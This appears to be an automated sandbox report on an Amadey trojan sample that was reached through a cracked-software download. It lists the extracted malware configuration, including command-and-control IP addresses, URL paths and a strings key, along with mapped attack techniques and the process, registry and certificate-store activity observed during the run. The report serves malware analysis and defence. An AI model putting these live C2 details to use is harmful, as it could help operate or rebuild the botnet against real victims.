amadey | hxxps://nvr5q[.]gotra[.]top/55/s6RZ8

Analysis

max time kernel
189s
max time network
153s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
18-12-2024 23:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://nvr5q.gotra.top/55/s6RZ8

Score

10^/10

amadey 7ff894 discovery execution trojan

Malware Config

Extracted

Family

amadey

Version

5.10

Botnet

7ff894

http://185.208.158.116

http://185.209.162.226

Attributes

install_dir
5ce3f566dd
install_file
Gxtuum.exe
strings_key
ab76263a4c4ffd38c0300987d14cb704
url_paths
/bVoZEtTa1/index.php

/bVoZEtTa3/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 844 created 2104	844	11088582	49

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
3048	powershell.exe
4952	powershell.exe

Executes dropped EXE 12 IoCs

pid	Process
984	Launcher.exe
4036	Launcher.exe
2844	wget.exe
3868	winrar.exe
844	11088582
2332	wget.exe
1392	winrar.exe
1360	22040691
1780	Ide.com
3296	8e173ef658.exe
3068	Officials.com
3368	Officials.com

Loads dropped DLL 1 IoCs

pid	Process
2812	rundll32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
37	bitbucket.org
40	bitbucket.org
34	bitbucket.org

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3508	tasklist.exe
1376	tasklist.exe
3112	tasklist.exe
1972	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
844	11088582
844	11088582

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3068 set thread context of 3368	3068	Officials.com	146

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SportsMichigan	22040691
File opened for modification	C:\Windows\DirtyBaseline	22040691
File opened for modification	C:\Windows\IncTelevisions	22040691
File opened for modification	C:\Windows\CarefulIndiana	8e173ef658.exe
File opened for modification	C:\Windows\LionLies	8e173ef658.exe
File opened for modification	C:\Windows\BookmarkVariations	8e173ef658.exe
File opened for modification	C:\Windows\CleanersBrussels	8e173ef658.exe
File opened for modification	C:\Windows\WalkingOpens	8e173ef658.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4568	2812	WerFault.exe	142

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11088582
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8e173ef658.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22040691
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ide.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings	msedge.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\easeus-data-recovery-wizard-crack.zip:Zone.Identifier	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
276	schtasks.exe
768	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
760	msedge.exe
760	msedge.exe
2604	msedge.exe
2604	msedge.exe
1604	msedge.exe
1604	msedge.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
3048	powershell.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
3048	powershell.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
4952	powershell.exe
4952	powershell.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1544	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeRestorePrivilege	2180	7zG.exe
Token: 35	2180	7zG.exe
Token: SeSecurityPrivilege	2180	7zG.exe
Token: SeSecurityPrivilege	2180	7zG.exe
Token: SeDebugPrivilege	2072	taskmgr.exe
Token: SeSystemProfilePrivilege	2072	taskmgr.exe
Token: SeCreateGlobalPrivilege	2072	taskmgr.exe
Token: SeDebugPrivilege	1544	taskmgr.exe
Token: SeSystemProfilePrivilege	1544	taskmgr.exe
Token: SeCreateGlobalPrivilege	1544	taskmgr.exe
Token: 33	2072	taskmgr.exe
Token: SeIncBasePriorityPrivilege	2072	taskmgr.exe
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	3508	tasklist.exe
Token: SeDebugPrivilege	1376	tasklist.exe
Token: SeDebugPrivilege	3112	tasklist.exe
Token: SeDebugPrivilege	1972	tasklist.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2604	msedge.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
2072	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe
1544	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2604 wrote to memory of 3076	2604	msedge.exe	77
PID 2604 wrote to memory of 3076	2604	msedge.exe	77
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 920	2604	msedge.exe	78
PID 2604 wrote to memory of 760	2604	msedge.exe	79
PID 2604 wrote to memory of 760	2604	msedge.exe	79
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
